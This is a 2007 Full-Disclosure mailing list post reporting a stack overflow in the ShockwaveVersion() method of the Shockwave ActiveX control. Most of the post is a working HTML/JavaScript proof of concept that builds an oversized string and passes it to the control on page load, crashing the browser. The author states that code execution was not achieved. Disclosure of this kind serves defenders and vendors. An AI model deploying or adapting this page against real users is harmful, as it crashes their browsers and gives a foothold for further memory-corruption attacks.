Home / vulnerabilities swf-overflow.txt
Posted on 09 November 2007
Source : packetstormsecurity.org Link
There is a stack overflow in ShockwaveVersion() function. I have not been able to execute code via this overflow. PoC is as follows:
-----------------------
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 768 * 768) s=s+s;
var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}
obj.ShockwaveVersion(s);
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
-----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/